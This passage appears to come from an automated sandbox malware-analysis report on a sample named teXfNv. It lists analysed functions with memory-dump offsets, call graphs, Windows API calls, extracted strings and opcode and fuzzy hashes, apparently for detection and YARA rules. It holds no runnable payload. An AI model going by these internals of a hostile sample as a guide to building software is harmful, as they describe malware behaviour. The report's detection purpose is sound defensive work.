                                                                                                                                                          • Instruction Fuzzy Hash: BA21BC75E006199BEB58CFABD84479EFBF7EFC8201F04C5BAD409A6224DB341A458F51
                                                                                                                                                          Function 08921C8F Relevance: .1, Instructions: 55COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4de2d717a5c3061239e72501b286d511cc041428074d28b1d25d004995b679f2
                                                                                                                                                          • Instruction ID: c9362936bad3dad1ad8afd797b650bd6f71adf31de7f407eaec10777b5964d1d
                                                                                                                                                          • Opcode Fuzzy Hash: 4de2d717a5c3061239e72501b286d511cc041428074d28b1d25d004995b679f2
                                                                                                                                                          • Instruction Fuzzy Hash: 2A21E7B0E016188BDB58CFABC9446DEBBF3AFC9300F14C17AD409AA358DA741A45CF40
                                                                                                                                                          Function 058636D8 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 333 58636d8-5863777 GetCurrentProcess 337 5863780-58637b4 GetCurrentThread 333->337 338 5863779-586377f 333->338 339 58637b6-58637bc 337->339 340 58637bd-58637f1 GetCurrentProcess 337->340 338->337 339->340 342 58637f3-58637f9 340->342 343 58637fa-5863815 call 58638c2 340->343 342->343 346 586381b-586384a GetCurrentThreadId 343->346 347 5863853-58638b5 346->347 348 586384c-5863852 346->348 348->347
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 05863766
                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 058637A3
                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 058637E0
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 05863839
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                          • Opcode ID: 45aa9eea824eef287312712219b199396f82ba8f45df6753ff1a85bc4d1b791d
                                                                                                                                                          • Instruction ID: 52778a37be1b1257890470a9db404ac4e31b390fedec969d5904cc708aa2c32c
                                                                                                                                                          • Opcode Fuzzy Hash: 45aa9eea824eef287312712219b199396f82ba8f45df6753ff1a85bc4d1b791d
                                                                                                                                                          • Instruction Fuzzy Hash: 125163B09003498FDB14DFA9D948B9EBFF1FF48314F248469D849A7260DB34A984CF66
                                                                                                                                                          Function 058636E8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 355 58636e8-5863777 GetCurrentProcess 359 5863780-58637b4 GetCurrentThread 355->359 360 5863779-586377f 355->360 361 58637b6-58637bc 359->361 362 58637bd-58637f1 GetCurrentProcess 359->362 360->359 361->362 364 58637f3-58637f9 362->364 365 58637fa-5863815 call 58638c2 362->365 364->365 368 586381b-586384a GetCurrentThreadId 365->368 369 5863853-58638b5 368->369 370 586384c-5863852 368->370 370->369
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 05863766
                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 058637A3
                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 058637E0
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 05863839
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2063062207-0
                                                                                                                                                          • Opcode ID: 03cb048bfd7dde98efa9d89aadef41efce4b09148b7f9e827e782250a1a5fc68
                                                                                                                                                          • Instruction ID: 2d37ecccce3214175580399e98be233f5ea7f262be58bf3bbc3857b981d72b97
                                                                                                                                                          • Opcode Fuzzy Hash: 03cb048bfd7dde98efa9d89aadef41efce4b09148b7f9e827e782250a1a5fc68
                                                                                                                                                          • Instruction Fuzzy Hash: DA5145B09007098FDB54DFAAD548B9EBBF1FF88314F248469D419A7360DB34A984CF66
                                                                                                                                                          Function 0892AF60 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                                                                                                          Download Yara Rule

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          • Executed
                                                                                                                                                          • Not Executed
                                                                                                                                                          control_flow_graph 683 892af60-892af83 684 892af85 683->684 685 892af8a-892b0a0 683->685 684->685 715 892b0a3 call 892b160 685->715 716 892b0a3 call 892b15c 685->716 691 892b0a9-892b0b0 725 892afdf call 892b750 691->725 726 892afdf call 892b760 691->726 697 892afe5-892b064 699 892b144-892b14a 697->699 701 892afc7-892afcb 699->701 702 892b0c1-892b131 701->702 703 892afd1-892b0b6 701->703 717 892b133 call 892bfc0 702->717 718 892b133 call 892c477 702->718 719 892b133 call 892c21b 702->719 720 892b133 call 892bd98 702->720 721 892b133 call 892bda8 702->721 722 892b133 call 892be8f 702->722 723 892b133 call 892c34f 702->723 724 892b133 call 892c1bc 702->724 703->701 714 892b139-892b143 714->699 715->691 716->691 717->714 718->714 719->714 720->714 721->714 722->714 723->714 724->714 725->697 726->697
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tekq$Tekq
                                                                                                                                                          • API String ID: 0-2269808460
                                                                                                                                                          • Opcode ID: b816242e7b19d6b188899068bb076270f8dbe794a578ab0b8505f65f04d1aa89
                                                                                                                                                          • Instruction ID: 7c71eefbb7b151ecec6f00a28c1c5fb66e4c6ed5db87b473ff919bb1d981a1b6
                                                                                                                                                          • Opcode Fuzzy Hash: b816242e7b19d6b188899068bb076270f8dbe794a578ab0b8505f65f04d1aa89
                                                                                                                                                          • Instruction Fuzzy Hash: 8F61D4B4E04228CFCB04DFA9C944AEEBBF6BF89311F109429E51AAB359DB355905CF50
                                                                                                                                                          Function 05861040 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 05861296
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                          • Opcode ID: 4aa827bf2d043ccd47f14672063b1c7dd79f1babaf3a6bb8aa2f4a8be5f7885f
                                                                                                                                                          • Instruction ID: 166d81b877d67b30738ef6663196bcca2c0eaf6c9ac1eaa31af12a6fbb663605
                                                                                                                                                          • Opcode Fuzzy Hash: 4aa827bf2d043ccd47f14672063b1c7dd79f1babaf3a6bb8aa2f4a8be5f7885f
                                                                                                                                                          • Instruction Fuzzy Hash: DC713470A00B058FDB24DF2AD54976ABBF2BF88304F00892DD886D7B51DB35E949CB91
                                                                                                                                                          Function 05867AA8 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05867BC2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                          • Opcode ID: 068c288470c9ccb89d22b745f1116e6e155a0b4c50e783edac98d0be3db62949
                                                                                                                                                          • Instruction ID: ef736790f37037d5ad6a17dca3f62a64cfa37f48096895d959c7c06d6a63b12d
                                                                                                                                                          • Opcode Fuzzy Hash: 068c288470c9ccb89d22b745f1116e6e155a0b4c50e783edac98d0be3db62949
                                                                                                                                                          • Instruction Fuzzy Hash: 1A51BDB1D00309DFDB14CFA9C985ADEBBB5FF48314F24862AE819AB214D7759885CF90
                                                                                                                                                          Function 05867AB0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05867BC2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 716092398-0
                                                                                                                                                          • Opcode ID: 1574ddd02dcd7483f235942156998f203d11fad4c1ce1361dc421656d282f4d2
                                                                                                                                                          • Instruction ID: ecd08d0f598764f05608d2473c11a4acbb3871b8996b9fabf7dcd6908eefbc38
                                                                                                                                                          • Opcode Fuzzy Hash: 1574ddd02dcd7483f235942156998f203d11fad4c1ce1361dc421656d282f4d2
                                                                                                                                                          • Instruction Fuzzy Hash: C141BFB1D00309DFDB14CF99C984ADEBBB5FF48314F24852AE819AB214D7759885CF90
                                                                                                                                                          Function 0586564C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 0586A2C1
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallProcWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2714655100-0
                                                                                                                                                          • Opcode ID: bfeb48b18c451a459495f0751e26381decbcf75a277f414a0bfdda36487a52ef
                                                                                                                                                          • Instruction ID: 0cd365eebf07e392aae7084a724050d062bf20baacb75c05fe8c98be66be8db1
                                                                                                                                                          • Opcode Fuzzy Hash: bfeb48b18c451a459495f0751e26381decbcf75a277f414a0bfdda36487a52ef
                                                                                                                                                          • Instruction Fuzzy Hash: 204107B4A00309DFDB14CF99C488AAABBF5FF88314F24C459E519AB321D775A845CBA0
                                                                                                                                                          Function 0160ADCD Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 0160AE89
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1762720262.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_1600000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Create
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                          • Opcode ID: 7947e3dc34fbf505bded34a5d6dc7e124a3255375c1ed8789493495f0d24d43b
                                                                                                                                                          • Instruction ID: 11ec803cf01692db26827975a5ecb2c63989497aa27742c551b026229cdd5555
                                                                                                                                                          • Opcode Fuzzy Hash: 7947e3dc34fbf505bded34a5d6dc7e124a3255375c1ed8789493495f0d24d43b
                                                                                                                                                          • Instruction Fuzzy Hash: 0741D4B1C00719CFDB28DFA9C944BCEBBB5BF48304F24846AD408AB255DB756946CF91
                                                                                                                                                          Function 016098C0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateActCtxA.KERNEL32(?), ref: 0160AE89
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1762720262.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_1600000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Create
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                          • Opcode ID: 15108a080600b6da47be62509b1b40540bb5a6c6b8df2f25a258724385474ce2
                                                                                                                                                          • Instruction ID: bd76c1ce9376a697fae90d9a46d4a5429406eaad8b1363ac30546ef10116b2b9
                                                                                                                                                          • Opcode Fuzzy Hash: 15108a080600b6da47be62509b1b40540bb5a6c6b8df2f25a258724385474ce2
                                                                                                                                                          • Instruction Fuzzy Hash: D841C2B1C00719CFDB29DFA9C844B9EBBF5BF48304F24846AD408AB295DB756946CF90
                                                                                                                                                          Function 05863928 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 058639B7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                          • Opcode ID: ec86b822b145eda937a2eb97ba3936204989b214fa16a21905a16361e10060b2
                                                                                                                                                          • Instruction ID: 4051dd932140bb891b19295bac8c80ae632df424f3e7600463fcedf4759cdebf
                                                                                                                                                          • Opcode Fuzzy Hash: ec86b822b145eda937a2eb97ba3936204989b214fa16a21905a16361e10060b2
                                                                                                                                                          • Instruction Fuzzy Hash: 0A2114B5900248EFDB10CF9AD584ADEBBF4FF48320F14841AE954A3310D378A944CFA4
                                                                                                                                                          Function 05863930 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 058639B7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DuplicateHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3793708945-0
                                                                                                                                                          • Opcode ID: 9c04db17456dd6f76414fafb5a7e5219a101f44928f419b7280088cfd002559b
                                                                                                                                                          • Instruction ID: 7e6cbd00293d80e4a6e6d36860a23728a1babf9641bd32199d18cd13a6b3a051
                                                                                                                                                          • Opcode Fuzzy Hash: 9c04db17456dd6f76414fafb5a7e5219a101f44928f419b7280088cfd002559b
                                                                                                                                                          • Instruction Fuzzy Hash: 6621E4B59002089FDB10CF9AD584ADEBBF4FB48310F14841AE955A3310C374A944CFA4
                                                                                                                                                          Function 05861230 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 05861296
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1776730357.0000000005860000.00000040.00000800.00020000.00000000.sdmp, Offset: 05860000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_5860000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                          • Opcode ID: d334b088c9142f37eca308eb7d0ae76745a163e27cb325650c7d859543bd7894
                                                                                                                                                          • Instruction ID: 6ea6d37709cbfd8ae2ff731cc6acd09e4069da58acf612cea3e6d59437563106
                                                                                                                                                          • Opcode Fuzzy Hash: d334b088c9142f37eca308eb7d0ae76745a163e27cb325650c7d859543bd7894
                                                                                                                                                          • Instruction Fuzzy Hash: 8D110FB6C002498FCB10CF9AC448ADEFBF4AB88220F10842AD819A7610C379A545CFA5
                                                                                                                                                          Function 0892AF58 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tekq
                                                                                                                                                          • API String ID: 0-2319236580
                                                                                                                                                          • Opcode ID: 358e5a44f2a888f6764091a3613b45755f19c1cd988e9c6732ca1eb2122bcdbf
                                                                                                                                                          • Instruction ID: 0b200db5546c6f94a446830e94ced0556ba4b31b3b677901d3a401e128fb255b
                                                                                                                                                          • Opcode Fuzzy Hash: 358e5a44f2a888f6764091a3613b45755f19c1cd988e9c6732ca1eb2122bcdbf
                                                                                                                                                          • Instruction Fuzzy Hash: C54107B4E08268CFCB04DFAAC5446EEBBF6AF89311F109429D41ABB359DB345905CF50
                                                                                                                                                          Function 08921470 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: OijW
                                                                                                                                                          • API String ID: 0-3475513506
                                                                                                                                                          • Opcode ID: 2e1f37ff4a9297664f4f2714dcf5257bf2f7157cf6795f4c333eeb2aa62f52af
                                                                                                                                                          • Instruction ID: 6c0830d29d2b9125e4bc80498ec1e59521c2813c4851417e4a6a471614527f34
                                                                                                                                                          • Opcode Fuzzy Hash: 2e1f37ff4a9297664f4f2714dcf5257bf2f7157cf6795f4c333eeb2aa62f52af
                                                                                                                                                          • Instruction Fuzzy Hash: 603107B4E0421ADFCB44DFA9D4819AEFBF2EF88301F1084AAC819A7314D734AA51CF51
                                                                                                                                                          Function 08921480 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: OijW
                                                                                                                                                          • API String ID: 0-3475513506
                                                                                                                                                          • Opcode ID: fad1a48471c706f2c08135d2175c9da6c78cc2a68f6e722a7b19d6845431affc
                                                                                                                                                          • Instruction ID: 166de6b427c6fd0d364a2cf77c472a5071d0148afa95b8e88e05247c75380a0c
                                                                                                                                                          • Opcode Fuzzy Hash: fad1a48471c706f2c08135d2175c9da6c78cc2a68f6e722a7b19d6845431affc
                                                                                                                                                          • Instruction Fuzzy Hash: 8831D5B4E0421ADFCB44DFA9D481AAEFBF2EF88301F10946AD819A7314D734AA51CF50
                                                                                                                                                          Function 08923188 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ?H,a
                                                                                                                                                          • API String ID: 0-4093759987
                                                                                                                                                          • Opcode ID: eca5c7f648bd69a45ee1828e3f5579199b14a49024ca2bf823e297d40f7f14dc
                                                                                                                                                          • Instruction ID: 7ad9386f428844d9c25797f815407b7d7d397c6381572b5225ea95a0a5e6c7de
                                                                                                                                                          • Opcode Fuzzy Hash: eca5c7f648bd69a45ee1828e3f5579199b14a49024ca2bf823e297d40f7f14dc
                                                                                                                                                          • Instruction Fuzzy Hash: AD214A74E04209DFDB08DFA9C984A9EFBF2EF88301F24C6A9D41597369DA309A01DB00
                                                                                                                                                          Function 08923190 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: ?H,a
                                                                                                                                                          • API String ID: 0-4093759987
                                                                                                                                                          • Opcode ID: dd4d188624cc2622583e151c214b35709132dde1521b48265f3c4bdd0fccfadb
                                                                                                                                                          • Instruction ID: c0b2717bf42a3812244215835b9f32b655f880f66cdc857de439512da5ff8d38
                                                                                                                                                          • Opcode Fuzzy Hash: dd4d188624cc2622583e151c214b35709132dde1521b48265f3c4bdd0fccfadb
                                                                                                                                                          • Instruction Fuzzy Hash: 74211874E04218EFDB48DFA9C985A9EFBF2EF88301F14C5A9D41997369DA349A01DB40
                                                                                                                                                          Function 08928023 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: u|P
                                                                                                                                                          • API String ID: 0-1764873574
                                                                                                                                                          • Opcode ID: 3c677cd1d3ef6de05382d23b0f3151d310f5cc2267f37a774da9d869fc499500
                                                                                                                                                          • Instruction ID: a6c521f1c4fb5d76ddd5ab77f786e8a95c33355a76d16c5dac4b73de01c48063
                                                                                                                                                          • Opcode Fuzzy Hash: 3c677cd1d3ef6de05382d23b0f3151d310f5cc2267f37a774da9d869fc499500
                                                                                                                                                          • Instruction Fuzzy Hash: 71112BB4E05219DFCB44DFA9D5416EEBBF2EB88311F24846AC509A3304E6349B41CB55
                                                                                                                                                          Function 08928028 Relevance: 1.3, Strings: 1, Instructions: 52COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: u|P
                                                                                                                                                          • API String ID: 0-1764873574
                                                                                                                                                          • Opcode ID: 4885cb97c87ed86cf4c1f1a3d03ff52e2637aab2554f759c65f6034bd56ecd77
                                                                                                                                                          • Instruction ID: 309417731763973c9587460f0d559f49324d1578a4688e249c5698f4f3e0e85c
                                                                                                                                                          • Opcode Fuzzy Hash: 4885cb97c87ed86cf4c1f1a3d03ff52e2637aab2554f759c65f6034bd56ecd77
                                                                                                                                                          • Instruction Fuzzy Hash: A31128B4E05219DFCB44DFA9C5415AEBBF2EB88311F2084BAC50AA3204E6349B41CB54
                                                                                                                                                          Function 08925FFD Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: G'/.
                                                                                                                                                          • API String ID: 0-3562003039
                                                                                                                                                          • Opcode ID: 37c745d511c2b33d87519aefadfa66d2fa1d91b77b76c971cb6fafb3f3052d94
                                                                                                                                                          • Instruction ID: b76efa8aff3acd6df3e867fb937ad93eed7131ea4130001ec2fc2752e8463b1a
                                                                                                                                                          • Opcode Fuzzy Hash: 37c745d511c2b33d87519aefadfa66d2fa1d91b77b76c971cb6fafb3f3052d94
                                                                                                                                                          • Instruction Fuzzy Hash: 5001DF70E55208EFCB08EFA6D64069DFFB2EB85311F20D8B9C006A3258EA309B40DB40
                                                                                                                                                          Function 08926000 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: G'/.
                                                                                                                                                          • API String ID: 0-3562003039
                                                                                                                                                          • Opcode ID: 7f71e646e847e25e21dbf2396b4984c84594bdcd44be649fd9235e975af1d42c
                                                                                                                                                          • Instruction ID: b98d038df5527585158d0643fc7e61c140f102c650c63f7e57edf7fc7d29bcbe
                                                                                                                                                          • Opcode Fuzzy Hash: 7f71e646e847e25e21dbf2396b4984c84594bdcd44be649fd9235e975af1d42c
                                                                                                                                                          • Instruction Fuzzy Hash: 6301D470E55218DFCB08EFA6D64055DFBB6EB99311F20D8B9C006A3258E6309B00D740
                                                                                                                                                          Function 0892FC08 Relevance: .3, Instructions: 296COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000008.00000002.1778296512.0000000008920000.00000040.00000800.00020000.00000000.sdmp, Offset: 08920000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_8_2_8920000_teXfNv.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5aa03db63ba7f6c1a035f85d23676c14e1749e928c47a5a529f98de3cfdb39f2
                                                                                                                                                          • Instruction ID: 0b11935acd83fbcd8e604fe6b79b9addc9b829e90e00346daf7684a175e38798
                                                                                                                                                          • Opcode Fuzzy Hash: 5aa03db63ba7f6c1a035f85d23676c14e1749e928c47a5a529f98de3cfdb39f2
